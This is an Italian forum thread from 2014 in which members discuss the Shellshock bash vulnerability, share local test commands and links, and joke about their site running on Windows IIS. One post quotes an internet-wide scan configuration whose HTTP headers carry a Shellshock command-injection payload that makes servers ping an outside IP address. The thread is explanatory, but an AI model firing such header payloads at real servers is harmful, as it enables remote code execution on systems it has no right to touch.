Shellshock

Hai voglia di parlare di qualcosa che non e' presente nelle altre sezioni? Dicci dicci...

Shellshock

Messaggioda thesave » 27/09/2014, 1:07

Parlavo stasera con alcuni di noi di shell shock e ho pensato di condividere la news con altri membi della ludoteca che potrebbero essere interessati.

L'hanno soprannominato shellshock dato che colpisce tramite bash, il principale linguaggio che gira nelle shell dei sistemi Unix-like (Linux, Mac).

Il bug è serio perché è presente in bash fino alla versione 4.3 e permette facilmente ad un attaccante esterno di eseguire codice (malevolo).

I web server Apache con mod CGI attivata sono i più a rischio, ma anche OpenSSH, clients DHCP.
Fondamentalmente qualsiasi dispositivo che fa girare un linux è potenzialmente a rischio (non saprei android, dato che è basato su Java non ci scommetterei).

Se volete testare se la vostra macchina è vulnerabile al baco basta provare ad eseguire i due comandi qua sotto

env X="() { :;} ; echo busted" /bin/sh -c "echo completed"

env X="() { :;} ; echo busted" `which bash` -c "echo completed"

Il primo è per sh, il secondo per bash.
Se nell'output leggere la stringa "busted" siete vulnerabili.

Il consiglio, ovviamente, è aggiornare quanto prima la vostra versione di bash all'ultimo aggiornamento.

Agli interessati amministratori di sistema e Linux/Mac users rimando a [1] che spiega in dettaglio il problema e continente i puntatori ai metodi per risolvere il bug nei vari SO.

[1] http://www.theregister.co.uk/2014/09/24 ... hell_vuln/
Avatar utente
thesave
Developer
 
Messaggi: 57
Iscritto il: 21/03/2014, 14:49

Re: R: Shellshock

Messaggioda Guizz » 27/09/2014, 1:16

Ah, però... Difficile a credersi... Certo che un bug nella shell é un colpo al cuore...

Inviato dal mio HTC Vision con Tapatalk 2
L'uomo non smette di giocare perché invecchia, ma invecchia perché smette di giocare. George Bernard Shaw
Avatar utente
Guizz
Administrator
 
Messaggi: 737
Iscritto il: 21/02/2014, 14:30
Località: Medicina

Re: Shellshock

Messaggioda thesave » 27/09/2014, 9:32

Eh si, lo hanno paragonato a heartbleed[1], ma secondo me è anche peggio, dato che ti basta inviare al server da attaccare una richiesta http tipo questa

target-ip = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash- ... ernet.html)
http-header[Cookie] = () { :; }; ping -c 3 209.126.230.74
http-header[Host] = () { :; }; ping -c 3 209.126.230.74
http-header[Referer] = () { :; }; ping -c 3 209.126.230.74

quella sopra è stata usata dall'esperto di sicurezza di Errata Sicurity Robert Graham [2] per verificare l'effettiva vulnerabilità dei sistemi sul web.
In questo caso tramite dei semplici header http riesce a far eseguire il codice di controllo, nel caso si fa pingare la macchina da cui ha eseguito l'attacco.

Nel caso vi interessi testare la vulnerabilità dei vostri sistemi [3] riporta una descrizione concisa del problema e mette a disposizione uno script da lanciare
dal sito che verifica se il vostro sistema (o meglio, la risorsa web a cui lo fate puntare) è vulnerabile all'attacco.

[1] http://xkcd.com/1354/
[2] http://blog.erratasec.com/2014/09/bash- ... CZmniuSxXB
[3] https://shellshocker.net/
Avatar utente
thesave
Developer
 
Messaggi: 57
Iscritto il: 21/03/2014, 14:49

Re: Shellshock

Messaggioda thesave » 27/09/2014, 9:34

Tra parentesi, ho fatto girare il test sul sito della ludoteca e me lo rileva come "possibly vulnerable".
Guizz, che tu sappia noi dove giriamo? LAMP?
Avatar utente
thesave
Developer
 
Messaggi: 57
Iscritto il: 21/03/2014, 14:49

Re: Shellshock

Messaggioda Guizz » 27/09/2014, 9:51

E' un server windows :shock: IIS 7.5 Windows Server 2008 R2 Datacenter Edition Service Pack 1
ma tanto quello e' vulnerabile per definizione :lol:
L'uomo non smette di giocare perché invecchia, ma invecchia perché smette di giocare. George Bernard Shaw
Avatar utente
Guizz
Administrator
 
Messaggi: 737
Iscritto il: 21/02/2014, 14:30
Località: Medicina

Re: Shellshock

Messaggioda thesave » 27/09/2014, 10:54

Beh, almeno non lo è per shellshock.
Bill si starà facendo grasse risate :P
Avatar utente
thesave
Developer
 
Messaggi: 57
Iscritto il: 21/03/2014, 14:49

Re: Shellshock

Messaggioda Guizz » 27/09/2014, 11:03

dal prossimo aggiornamento automatico di windows ci saranno milioni di easter eggs nascosti a riguardo :D
L'uomo non smette di giocare perché invecchia, ma invecchia perché smette di giocare. George Bernard Shaw
Avatar utente
Guizz
Administrator
 
Messaggi: 737
Iscritto il: 21/02/2014, 14:30
Località: Medicina


Torna a Varie ed eventuali

Chi c’è in linea

Visitano il forum: Nessuno e 1 ospite

cron